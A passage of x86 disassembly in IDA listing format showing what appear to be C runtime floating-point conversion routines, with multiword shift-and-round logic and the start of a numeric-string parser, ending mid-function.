		jns	short loc_411FB8
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_411FB8:				; CODE XREF: sub_411D19+298j
		and	[ebp+arg_0], 0
		xor	edx, edx
		sub	ecx, esi
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		lea	edi, [esi+edx]
		cmp	edi, esi
		jb	short loc_411FD4
		cmp	edi, edx
		jnb	short loc_411FDB

loc_411FD4:				; CODE XREF: sub_411D19+2B5j
		mov	[ebp+arg_0], 1

loc_411FDB:				; CODE XREF: sub_411D19+2B9j
		mov	[ecx], edi
		mov	ecx, [ebp+arg_0]
		jmp	short loc_412001
; ---------------------------------------------------------------------------

loc_411FE2:				; CODE XREF: sub_411D19+2E9j
		test	ecx, ecx
		jz	short loc_412004
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		xor	edi, edi
		cmp	esi, edx
		jb	short loc_411FFA
		cmp	esi, 1
		jnb	short loc_411FFD

loc_411FFA:				; CODE XREF: sub_411D19+2DAj
		xor	edi, edi
		inc	edi

loc_411FFD:				; CODE XREF: sub_411D19+2DFj
		mov	[ecx], esi
		mov	ecx, edi

loc_412001:				; CODE XREF: sub_411D19+2C7j
		dec	eax
		jns	short loc_411FE2

loc_412004:				; CODE XREF: sub_411D19+263j
					; sub_411D19+283j ...
		mov	ecx, [ebp+var_10]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[ebx], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412024
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412024:				; CODE XREF: sub_411D19+2FCj
		mov	ecx, dword_42423C
		inc	ecx
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412045
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412045:				; CODE XREF: sub_411D19+325j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412060:				; CODE XREF: sub_411D19+372j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412060
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41209A:				; CODE XREF: sub_411D19+398j
		cmp	edx, eax
		jl	short loc_4120A6
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4120AB
; ---------------------------------------------------------------------------

loc_4120A6:				; CODE XREF: sub_411D19+383j
		and	[ebp+edx*4+var_20], 0

loc_4120AB:				; CODE XREF: sub_411D19+38Bj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41209A

loc_4120B3:				; CODE XREF: sub_411D19+188j
		push	2
		xor	ebx, ebx
		pop	eax
		jmp	loc_412217
; ---------------------------------------------------------------------------

loc_4120BD:				; CODE XREF: sub_411D19+18Fj
		cmp	ebx, dword_424230
		mov	ecx, dword_42423C
		jl	loc_41217C
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		or	[ebp+var_20], 80000000h
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4120F8
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4120F8:				; CODE XREF: sub_411D19+3D8j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412113:				; CODE XREF: sub_411D19+425j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412113
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41214D:				; CODE XREF: sub_411D19+44Bj
		cmp	edx, eax
		jl	short loc_412159
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41215E
; ---------------------------------------------------------------------------

loc_412159:				; CODE XREF: sub_411D19+436j
		and	[ebp+edx*4+var_20], 0

loc_41215E:				; CODE XREF: sub_411D19+43Ej
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41214D
		mov	eax, dword_424230
		mov	ecx, dword_424244
		lea	ebx, [ecx+eax]
		xor	eax, eax
		inc	eax
		jmp	loc_412217
; ---------------------------------------------------------------------------

loc_41217C:				; CODE XREF: sub_411D19+3B0j
		mov	eax, dword_424244
		and	[ebp+var_20], 7FFFFFFFh
		add	ebx, eax
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4121A4
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4121A4:				; CODE XREF: sub_411D19+484j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	esi, 0FFFFFFFFh
		mov	ecx, edx
		shl	esi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	esi

loc_4121BF:				; CODE XREF: sub_411D19+4D4j
		mov	ecx, [ebp+arg_0]
		mov	edi, [ebp+ecx*4+var_20]
		mov	ecx, edi
		and	ecx, esi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	edi, [ebp+var_C]
		mov	[ebp+ecx*4+var_20], edi
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_4]
		shl	edi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], edi
		jl	short loc_4121BF
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_4121FC:				; CODE XREF: sub_411D19+4FAj
		cmp	edx, eax
		jl	short loc_412208
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41220D
; ---------------------------------------------------------------------------

loc_412208:				; CODE XREF: sub_411D19+4E5j
		and	[ebp+edx*4+var_20], 0

loc_41220D:				; CODE XREF: sub_411D19+4EDj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_4121FC
		xor	eax, eax

loc_412217:				; CODE XREF: sub_411D19+39Fj
					; sub_411D19+45Ej
		pop	esi

loc_412218:				; CODE XREF: sub_411D19+55j
					; sub_411D19+65j
		push	1Fh
		pop	ecx
		sub	ecx, dword_42423C
		shl	ebx, cl
		mov	ecx, [ebp+var_14]
		neg	ecx
		sbb	ecx, ecx
		and	ecx, 80000000h
		or	ebx, ecx
		mov	ecx, dword_424240
		or	ebx, [ebp+var_20]
		cmp	ecx, 40h
		jnz	short loc_41224D
		mov	ecx, [ebp+arg_4]
		mov	edx, [ebp+var_1C]
		mov	[ecx+4], ebx
		mov	[ecx], edx
		jmp	short loc_412257
; ---------------------------------------------------------------------------

loc_41224D:				; CODE XREF: sub_411D19+525j
		cmp	ecx, 20h
		jnz	short loc_412257
		mov	ecx, [ebp+arg_4]
		mov	[ecx], ebx

loc_412257:				; CODE XREF: sub_411D19+532j
					; sub_411D19+537j
		pop	edi
		pop	ebx
		leave
		retn
sub_411D19	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41225B	proc near		; CODE XREF: sub_411903+44p

var_2C		= byte ptr -2Ch
var_20		= dword	ptr -20h
var_1C		= dword	ptr -1Ch
var_18		= dword	ptr -18h
var_14		= dword	ptr -14h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, [ebp+arg_0]
		movzx	ecx, word ptr [eax+0Ah]
		push	ebx
		mov	ebx, ecx
		and	ecx, 8000h
		mov	[ebp+var_14], ecx
		mov	ecx, [eax+6]
		mov	[ebp+var_20], ecx
		mov	ecx, [eax+2]
		movzx	eax, word ptr [eax]
		and	ebx, 7FFFh
		sub	ebx, 3FFFh
		shl	eax, 10h
		cmp	ebx, 0FFFFC001h
		push	edi
		mov	[ebp+var_1C], ecx
		mov	[ebp+var_18], eax
		jnz	short loc_4122C5
		xor	ebx, ebx
		xor	eax, eax

loc_4122A2:				; CODE XREF: sub_41225B+51j
		cmp	[ebp+eax*4+var_20], ebx
		jnz	short loc_4122B5
		inc	eax
		cmp	eax, 3
		jl	short loc_4122A2
		xor	eax, eax
		jmp	loc_41275A
; ---------------------------------------------------------------------------

loc_4122B5:				; CODE XREF: sub_41225B+4Bj
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		push	2
		stosd
		pop	eax
		jmp	loc_41275A
; ---------------------------------------------------------------------------

loc_4122C5:				; CODE XREF: sub_41225B+41j
		and	[ebp+arg_0], 0
		push	esi
		lea	esi, [ebp+var_20]
		lea	edi, [ebp+var_2C]
		movsd
		movsd
		movsd
		mov	esi, dword_424250
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_10], ebx
		mov	[ebp+var_C], eax
		jns	short loc_4122FD
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4122FD:				; CODE XREF: sub_41225B+9Bj
		lea	edi, [ebp+eax*4+var_20]
		push	1Fh
		xor	eax, eax
		pop	ecx
		sub	ecx, edx
		inc	eax
		shl	eax, cl
		mov	[ebp+var_8], ecx
		test	[edi], eax
		jz	loc_4123A3
		mov	eax, [ebp+var_C]
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_41232B
; ---------------------------------------------------------------------------

loc_412326:				; CODE XREF: sub_41225B+D6j
		cmp	[ebp+eax*4+var_20], 0

loc_41232B:				; CODE XREF: sub_41225B+C9j
		jnz	short loc_412335
		inc	eax
		cmp	eax, 3
		jl	short loc_412326
		jmp	short loc_4123A3
; ---------------------------------------------------------------------------

loc_412335:				; CODE XREF: sub_41225B:loc_41232Bj
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_41234F
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_41234F:				; CODE XREF: sub_41225B+EDj
		and	[ebp+var_4], 0
		sub	ecx, esi
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		add	esi, edx
		mov	[ebp+arg_0], esi
		mov	esi, [ecx]
		cmp	[ebp+arg_0], esi
		jb	short loc_41238E
		cmp	[ebp+arg_0], edx
		jmp	short loc_41238C
; ---------------------------------------------------------------------------

loc_412371:				; CODE XREF: sub_41225B+143j
		test	ecx, ecx
		jz	short loc_4123A0
		and	[ebp+var_4], 0
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		cmp	esi, edx
		mov	[ebp+arg_0], esi
		jb	short loc_41238E
		cmp	esi, 1

loc_41238C:				; CODE XREF: sub_41225B+114j
		jnb	short loc_412395

loc_41238E:				; CODE XREF: sub_41225B+10Fj
					; sub_41225B+12Cj
		mov	[ebp+var_4], 1

loc_412395:				; CODE XREF: sub_41225B:loc_41238Cj
		dec	eax
		mov	edx, [ebp+arg_0]
		mov	[ecx], edx
		mov	ecx, [ebp+var_4]
		jns	short loc_412371

loc_4123A0:				; CODE XREF: sub_41225B+118j
		mov	[ebp+arg_0], ecx

loc_4123A3:				; CODE XREF: sub_41225B+B5j
					; sub_41225B+D8j
		mov	ecx, [ebp+var_8]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[edi], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_4123C3
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_4123C3:				; CODE XREF: sub_41225B+159j
		cmp	[ebp+arg_0], 0
		jz	short loc_4123CA
		inc	ebx

loc_4123CA:				; CODE XREF: sub_41225B+16Cj
		mov	eax, dword_42424C
		mov	ecx, eax
		sub	ecx, dword_424250
		cmp	ebx, ecx
		jge	short loc_4123E8
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		jmp	loc_4125F5
; ---------------------------------------------------------------------------

loc_4123E8:				; CODE XREF: sub_41225B+17Ej
		cmp	ebx, eax
		jg	loc_4125FF
		sub	eax, [ebp+var_10]
		lea	esi, [ebp+var_2C]
		mov	ecx, eax
		lea	edi, [ebp+var_20]
		movsd
		cdq
		and	edx, 1Fh
		add	eax, edx
		movsd
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		movsd
		jns	short loc_412416
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412416:				; CODE XREF: sub_41225B+1B4j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412431:				; CODE XREF: sub_41225B+201j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412431
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41246B:				; CODE XREF: sub_41225B+227j
		cmp	edx, eax
		jl	short loc_412477
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41247C
; ---------------------------------------------------------------------------

loc_412477:				; CODE XREF: sub_41225B+212j
		and	[ebp+edx*4+var_20], 0

loc_41247C:				; CODE XREF: sub_41225B+21Aj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41246B
		mov	esi, dword_424250
		dec	esi
		lea	ecx, [esi+1]
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		sar	eax, 5
		mov	edx, ecx
		and	edx, 8000001Fh
		mov	[ebp+var_C], eax
		jns	short loc_4124AB
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4124AB:				; CODE XREF: sub_41225B+249j
		push	1Fh
		pop	ecx
		sub	ecx, edx
		xor	edx, edx
		inc	edx
		shl	edx, cl
		lea	ebx, [ebp+eax*4+var_20]
		mov	[ebp+var_10], ecx
		test	[ebx], edx
		jz	loc_412546
		or	edx, 0FFFFFFFFh
		shl	edx, cl
		not	edx
		test	[ebp+eax*4+var_20], edx
		jmp	short loc_4124D6
; ---------------------------------------------------------------------------

loc_4124D1:				; CODE XREF: sub_41225B+281j
		cmp	[ebp+eax*4+var_20], 0

loc_4124D6:				; CODE XREF: sub_41225B+274j
		jnz	short loc_4124E0
		inc	eax
		cmp	eax, 3
		jl	short loc_4124D1
		jmp	short loc_412546
; ---------------------------------------------------------------------------

loc_4124E0:				; CODE XREF: sub_41225B:loc_4124D6j
		mov	eax, esi
		cdq
		push	1Fh
		pop	ecx
		and	edx, ecx
		add	eax, edx
		sar	eax, 5
		and	esi, 8000001Fh
		jns	short loc_4124FA
		dec	esi
		or	esi, 0FFFFFFE0h
		inc	esi

loc_4124FA:				; CODE XREF: sub_41225B+298j
		and	[ebp+arg_0], 0
		xor	edx, edx
		sub	ecx, esi
		inc	edx
		shl	edx, cl
		lea	ecx, [ebp+eax*4+var_20]
		mov	esi, [ecx]
		lea	edi, [esi+edx]
		cmp	edi, esi
		jb	short loc_412516
		cmp	edi, edx
		jnb	short loc_41251D

loc_412516:				; CODE XREF: sub_41225B+2B5j
		mov	[ebp+arg_0], 1

loc_41251D:				; CODE XREF: sub_41225B+2B9j
		mov	[ecx], edi
		mov	ecx, [ebp+arg_0]
		jmp	short loc_412543
; ---------------------------------------------------------------------------

loc_412524:				; CODE XREF: sub_41225B+2E9j
		test	ecx, ecx
		jz	short loc_412546
		lea	ecx, [ebp+eax*4+var_20]
		mov	edx, [ecx]
		lea	esi, [edx+1]
		xor	edi, edi
		cmp	esi, edx
		jb	short loc_41253C
		cmp	esi, 1
		jnb	short loc_41253F

loc_41253C:				; CODE XREF: sub_41225B+2DAj
		xor	edi, edi
		inc	edi

loc_41253F:				; CODE XREF: sub_41225B+2DFj
		mov	[ecx], esi
		mov	ecx, edi

loc_412543:				; CODE XREF: sub_41225B+2C7j
		dec	eax
		jns	short loc_412524

loc_412546:				; CODE XREF: sub_41225B+263j
					; sub_41225B+283j ...
		mov	ecx, [ebp+var_10]
		or	eax, 0FFFFFFFFh
		shl	eax, cl
		and	[ebx], eax
		mov	eax, [ebp+var_C]
		inc	eax
		cmp	eax, 3
		jge	short loc_412566
		push	3
		pop	ecx
		lea	edi, [ebp+eax*4+var_20]
		sub	ecx, eax
		xor	eax, eax
		rep stosd

loc_412566:				; CODE XREF: sub_41225B+2FCj
		mov	ecx, dword_424254
		inc	ecx
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_412587
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_412587:				; CODE XREF: sub_41225B+325j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_4125A2:				; CODE XREF: sub_41225B+372j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_4125A2
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_4125DC:				; CODE XREF: sub_41225B+398j
		cmp	edx, eax
		jl	short loc_4125E8
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4125ED
; ---------------------------------------------------------------------------

loc_4125E8:				; CODE XREF: sub_41225B+383j
		and	[ebp+edx*4+var_20], 0

loc_4125ED:				; CODE XREF: sub_41225B+38Bj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_4125DC

loc_4125F5:				; CODE XREF: sub_41225B+188j
		push	2
		xor	ebx, ebx
		pop	eax
		jmp	loc_412759
; ---------------------------------------------------------------------------

loc_4125FF:				; CODE XREF: sub_41225B+18Fj
		cmp	ebx, dword_424248
		mov	ecx, dword_424254
		jl	loc_4126BE
		xor	eax, eax
		lea	edi, [ebp+var_20]
		stosd
		stosd
		stosd
		or	[ebp+var_20], 80000000h
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_41263A
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_41263A:				; CODE XREF: sub_41225B+3D8j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	edi, 0FFFFFFFFh
		mov	ecx, edx
		shl	edi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	edi

loc_412655:				; CODE XREF: sub_41225B+425j
		mov	ebx, [ebp+arg_0]
		lea	ebx, [ebp+ebx*4+var_20]
		mov	esi, [ebx]
		mov	ecx, esi
		and	ecx, edi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	esi, cl
		mov	ecx, [ebp+var_4]
		or	esi, [ebp+var_C]
		mov	[ebx], esi
		mov	esi, [ebp+var_10]
		shl	esi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], esi
		jl	short loc_412655
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41268F:				; CODE XREF: sub_41225B+44Bj
		cmp	edx, eax
		jl	short loc_41269B
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_4126A0
; ---------------------------------------------------------------------------

loc_41269B:				; CODE XREF: sub_41225B+436j
		and	[ebp+edx*4+var_20], 0

loc_4126A0:				; CODE XREF: sub_41225B+43Ej
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41268F
		mov	eax, dword_424248
		mov	ecx, dword_42425C
		lea	ebx, [ecx+eax]
		xor	eax, eax
		inc	eax
		jmp	loc_412759
; ---------------------------------------------------------------------------

loc_4126BE:				; CODE XREF: sub_41225B+3B0j
		mov	eax, dword_42425C
		and	[ebp+var_20], 7FFFFFFFh
		add	ebx, eax
		mov	eax, ecx
		cdq
		and	edx, 1Fh
		add	eax, edx
		mov	edx, ecx
		sar	eax, 5
		and	edx, 8000001Fh
		jns	short loc_4126E6
		dec	edx
		or	edx, 0FFFFFFE0h
		inc	edx

loc_4126E6:				; CODE XREF: sub_41225B+484j
		and	[ebp+var_C], 0
		and	[ebp+arg_0], 0
		or	esi, 0FFFFFFFFh
		mov	ecx, edx
		shl	esi, cl
		mov	[ebp+var_4], 20h
		sub	[ebp+var_4], edx
		not	esi

loc_412701:				; CODE XREF: sub_41225B+4D4j
		mov	ecx, [ebp+arg_0]
		mov	edi, [ebp+ecx*4+var_20]
		mov	ecx, edi
		and	ecx, esi
		mov	[ebp+var_10], ecx
		mov	ecx, edx
		shr	edi, cl
		mov	ecx, [ebp+arg_0]
		or	edi, [ebp+var_C]
		mov	[ebp+ecx*4+var_20], edi
		mov	edi, [ebp+var_10]
		mov	ecx, [ebp+var_4]
		shl	edi, cl
		inc	[ebp+arg_0]
		cmp	[ebp+arg_0], 3
		mov	[ebp+var_C], edi
		jl	short loc_412701
		mov	esi, eax
		push	2
		shl	esi, 2
		lea	ecx, [ebp+var_18]
		pop	edx
		sub	ecx, esi

loc_41273E:				; CODE XREF: sub_41225B+4FAj
		cmp	edx, eax
		jl	short loc_41274A
		mov	esi, [ecx]
		mov	[ebp+edx*4+var_20], esi
		jmp	short loc_41274F
; ---------------------------------------------------------------------------

loc_41274A:				; CODE XREF: sub_41225B+4E5j
		and	[ebp+edx*4+var_20], 0

loc_41274F:				; CODE XREF: sub_41225B+4EDj
		dec	edx
		sub	ecx, 4
		test	edx, edx
		jge	short loc_41273E
		xor	eax, eax

loc_412759:				; CODE XREF: sub_41225B+39Fj
					; sub_41225B+45Ej
		pop	esi

loc_41275A:				; CODE XREF: sub_41225B+55j
					; sub_41225B+65j
		push	1Fh
		pop	ecx
		sub	ecx, dword_424254
		shl	ebx, cl
		mov	ecx, [ebp+var_14]
		neg	ecx
		sbb	ecx, ecx
		and	ecx, 80000000h
		or	ebx, ecx
		mov	ecx, dword_424258
		or	ebx, [ebp+var_20]
		cmp	ecx, 40h
		jnz	short loc_41278F
		mov	ecx, [ebp+arg_4]
		mov	edx, [ebp+var_1C]
		mov	[ecx+4], ebx
		mov	[ecx], edx
		jmp	short loc_412799
; ---------------------------------------------------------------------------

loc_41278F:				; CODE XREF: sub_41225B+525j
		cmp	ecx, 20h
		jnz	short loc_412799
		mov	ecx, [ebp+arg_4]
		mov	[ecx], ebx

loc_412799:				; CODE XREF: sub_41225B+532j
					; sub_41225B+537j
		pop	edi
		pop	ebx
		leave
		retn
sub_41225B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41279D	proc near		; CODE XREF: sub_41185D+37p
					; sub_411903+37p

var_7C		= dword	ptr -7Ch
var_78		= dword	ptr -78h
var_74		= dword	ptr -74h
var_70		= dword	ptr -70h
var_6C		= dword	ptr -6Ch
var_68		= dword	ptr -68h
var_64		= dword	ptr -64h
var_60		= dword	ptr -60h
var_5C		= dword	ptr -5Ch
var_58		= dword	ptr -58h
var_54		= dword	ptr -54h
var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= byte ptr -48h
var_46		= dword	ptr -46h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_32		= dword	ptr -32h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= byte ptr -20h
var_9		= byte ptr -9
var_4		= dword	ptr -4
arg_0		= dword	ptr  8
arg_4		= dword	ptr  0Ch
arg_8		= dword	ptr  10h
arg_C		= dword	ptr  14h
arg_10		= dword	ptr  18h
arg_14		= dword	ptr  1Ch
arg_18		= dword	ptr  20h
arg_1C		= dword	ptr  24h

		push	ebp
		mov	ebp, esp
		sub	esp, 7Ch
		mov	eax, dword_423064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		xor	ebx, ebx
		push	esi
		xor	esi, esi
		mov	[ebp+var_7C], eax
		mov	eax, [ebp+arg_4]
		inc	esi
		xor	ecx, ecx
		cmp	[ebp+arg_1C], ebx
		push	edi
		mov	[ebp+var_70], eax
		lea	edi, [ebp+var_20]
		mov	[ebp+var_74], ebx
		mov	[ebp+var_68], esi
		mov	[ebp+var_4C], ebx
		mov	[ebp+var_58], ebx
		mov	[ebp+var_5C], ebx
		mov	[ebp+var_60], ebx
		mov	[ebp+var_64], ebx
		mov	[ebp+var_50], ebx
		mov	[ebp+var_6C], ebx
		jnz	short loc_412805
		call	sub_405B83
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		push	ebx
		mov	dword ptr [eax], 16h
		call	sub_4032F9
		add	esp, 14h
		xor	eax, eax
		jmp	loc_412E1F
; ---------------------------------------------------------------------------

loc_412805:				; CODE XREF: sub_41279D+47j
		mov	edx, [ebp+arg_8]
		mov	[ebp+var_54], edx

loc_41280B:				; CODE XREF: sub_41279D+81j
		mov	al, [edx]
		cmp	al, 20h
		jz	short loc_41281D
		cmp	al, 9
		jz	short loc_41281D
		cmp	al, 0Ah
		jz	short loc_41281D
		cmp	al, 0Dh
		jnz	short loc_412820

loc_41281D:				; CODE XREF: sub_41279D+72j
					; sub_41279D+76j ...
		inc	edx
		jmp	short loc_41280B
; ---------------------------------------------------------------------------

loc_412820:				; CODE XREF: sub_41279D+7Ej
		mov	bl, 30h

loc_412822:				; CODE XREF: sub_41279D+A6j
					; sub_41279D+BCj ...
		mov	al, [edx]
		inc	edx
		cmp	ecx, 0Bh	; switch 12 cases
		ja	loc_412A5D	; default
					; jumptable 0041282E case 10
		jmp	ds:off_412E31[ecx*4] ; switch jump

loc_412835:				; DATA XREF: .text:off_412E31o
		mov	cl, al		; jumptable 0041282E case 0
		sub	cl, 31h
		cmp	cl, 8
		ja	short loc_412845

loc_41283F:				; CODE XREF: sub_41279D+F7j
					; sub_41279D+14Aj
		push	3

loc_412841:				; CODE XREF: sub_41279D+201j
					; sub_41279D+218j
		pop	ecx
		dec	edx
		jmp	short loc_412822
; ---------------------------------------------------------------------------

loc_412845:				; CODE XREF: sub_41279D+A0j
		mov	ecx, [ebp+arg_1C]
		mov	ecx, [ecx]
		mov	ecx, [ecx+0BCh]
		mov	ecx, [ecx]
		cmp	al, [ecx]
		jnz	short loc_41285B

loc_412856:				; CODE XREF: sub_41279D+15Fj
		push	5

loc_412858:				; CODE XREF: sub_41279D+10Cj
					; sub_41279D+138j ...
		pop	ecx
		jmp	short loc_412822
; ---------------------------------------------------------------------------

loc_41285B:				; CODE XREF: sub_41279D+B7j
		movsx	eax, al
		sub	eax, 2Bh
		jz	short loc_412880
		dec	eax
		dec	eax
		jz	short loc_412874
		sub	eax, 3
		jnz	loc_4129FB

loc_412870:				; CODE XREF: sub_41279D+118j
					; sub_41279D+167j
		mov	ecx, esi
		jmp	short loc_412822
; ---------------------------------------------------------------------------

loc_412874:				; CODE XREF: sub_41279D+C8j
		push	2
		pop	ecx
